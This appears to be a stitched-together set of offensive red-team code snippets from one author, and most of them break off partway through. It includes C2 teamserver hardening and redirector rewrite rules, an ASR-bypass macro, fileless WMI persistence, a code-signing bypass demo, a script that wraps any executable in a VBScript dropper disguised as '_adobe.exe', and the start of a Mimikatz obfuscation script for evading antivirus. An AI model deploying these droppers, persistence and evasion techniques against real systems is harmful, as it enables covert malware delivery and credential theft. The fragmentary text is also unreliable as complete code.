infosecn1nja

Make a rule that allows port 80/443 access only from redirector:

iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP

iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP

Change default port teamserver :
sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver

infosecn1nja

APT Group/Red Team Weaponization Phase
=======================================

C2 tools : 
- Cobalt Strike
- Empire
- PoshC2
- PupyRAT
- Metasploit

infosecn1nja

' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

Sub ASR_blocked()
    Dim WSHShell As Object
    Set WSHShell = CreateObject("Wscript.Shell")
    WSHShell.Run "cmd.exe"
End Sub

infosecn1nja

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;

public class TestClass
{
	
	public TestClass()
	{}

infosecn1nja

	RewriteEngine On
	
	# Uncomment the below line for verbose logging, including seeing which rule matched.
	#LogLevel alert rewrite:trace5
	
	# BURN AV BURN
	
	# AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device
	RewriteCond                             expr                                    "-R '54.0.0.0/8'" [OR]
        RewriteCond                             expr                                    "-R '52.0.0.0/8'" [OR]

infosecn1nja

from lib.common import helpers

class Stager:

    def __init__(self, mainMenu, params=[]):

        self.info = {
            'Name': 'wmic_xsl_starfighters',

            'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'],

infosecn1nja

# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
# https://wikileaks.org/ciav7p1/cms/page_14587908.html

<#
.SYNOPSIS
This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds.  The event will trigger only once.  
#>

$EventFilterName = "Fileless WMI Persistence SystemUptime"

infosecn1nja

$Host.Runspace.LanguageMode

Get-AuthenticodeSignature -FilePath C:\Demo\bypass_test.psm1
Get-AuthenticodeSignature -FilePath C:\Demo\notepad_backdoored.exe

# Try to execute the script. Add-Type will fail.
Import-Module C:\Demo\bypass_test.psm1

$VerifyHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +
                  '\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'

infosecn1nja

#!/bin/bash
convert2hex=$(xxd -p $1)
result=$(echo $convert2hex | sed s'/ //g')
echo 'Function n(s,c):n=String(s,c):End Function:t=t&"'$result'":Set s=CreateObject("Scripting.FileSystemObject"):p=s.getspecialfolder(2) & "_adobe.exe":Set f=s.CreateTextFile(p,1):for i=1 to len(t) step 2:f.Write Chr(int("&H" & mid(t,i,2))):next:f.Close:WScript.CreateObject("WScript.Shell").run(p)'

infosecn1nja

#!/bin/bash

if [[ $# -le 1 ]] ; then
    echo './obfuscate-mimikatz.sh Invoke-Mimikatz.ps1 newfile.ps1'
    exit 1
fi

randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};}

cp $1 $2